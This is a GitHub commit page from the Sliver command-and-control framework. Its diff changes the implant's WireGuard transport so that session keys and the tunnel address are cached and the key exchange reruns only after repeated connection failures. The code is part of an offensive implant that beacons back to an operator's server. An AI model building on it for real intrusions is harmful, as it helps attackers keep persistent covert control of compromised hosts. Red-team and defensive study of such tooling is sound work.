Skip to content

Commit

Permalink
Merge pull request #893 from jamesgol/wireshark-sessions
Browse files Browse the repository at this point in the history
Save implant Wireguard session keys
  • Loading branch information
moloch-- authored Sep 21, 2022
2 parents 6c21d34 + d41833c commit 1194920
Showing 1 changed file with 23 additions and 10 deletions.
33 changes: 23 additions & 10 deletions implant/sliver/transports/wireguard/wireguard.go
Original file line number Diff line number Diff line change
Expand Up @@ -59,7 +59,11 @@ var (
wgKeyExchangePort = getWgKeyExchangePort()
wgTcpCommsPort = getWgTcpCommsPort()

wgSessPrivKey string
wgSessPubKey string

PingInterval = 2 * time.Minute
failedConn = 0
)

// GetTNet - Get the netstack Net object
Expand Down Expand Up @@ -151,12 +155,11 @@ func ReadEnvelope(connection net.Conn) (*pb.Envelope, error) {
return envelope, nil
}

// WGConnect - Get a wg connection or die trying
func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {

// getSessKeys - Connect to the wireguard server and retrieve session specific keys and IP
func getSessKeys(address string, port uint16) error {
_, dev, tNet, err := bringUpWGInterface(address, port, wgImplantPrivKey, wgServerPubKey, wgPeerTunIP)
if err != nil {
return nil, nil, err
return err
}

dev.Up()
Expand All @@ -170,10 +173,10 @@ func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
// {{if .Config.Debug}}
log.Printf("Unable to connect to wg key exchange listener: %v", err)
// {{end}}
return nil, nil, err
return err
}

privKey, pubKey, newIP := doKeyExchange(keyExchangeConnection)
wgSessPrivKey, wgSessPubKey, tunAddress = doKeyExchange(keyExchangeConnection)

// {{if .Config.Debug}}
log.Printf("Signaling wg device to go down")
Expand All @@ -186,12 +189,21 @@ func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
// {{if .Config.Debug}}
log.Printf("Failed to close device.Device: %s", err)
// {{end}}
return nil, nil, err
return err
}
return nil
}

// WGConnect - Get a wg connection or die trying
func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
if wgSessPrivKey == "" || failedConn > 2 {
getSessKeys(address, port)
}

// Bring up second wireguard connection using retrieved keys and IP
_, dev, tNet, err = bringUpWGInterface(address, port, privKey, pubKey, newIP)
// Bring up actual wireguard connection using retrieved keys and IP
_, dev, tNet, err := bringUpWGInterface(address, port, wgSessPrivKey, wgSessPubKey, tunAddress)
if err != nil {
failedConn++
return nil, nil, err
}

Expand All @@ -200,14 +212,15 @@ func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
// {{if .Config.Debug}}
log.Printf("Unable to connect to sliver listener: %v", err)
// {{end}}
failedConn++
return nil, nil, err
}

// {{if .Config.Debug}}
log.Printf("Successfully connected to sliver listener")
// {{end}}
failedConn = 0
tunnelNet = tNet
tunAddress = newIP
return connection, dev, nil
}

Expand Down

0 comments on commit 1194920

Please sign in to comment.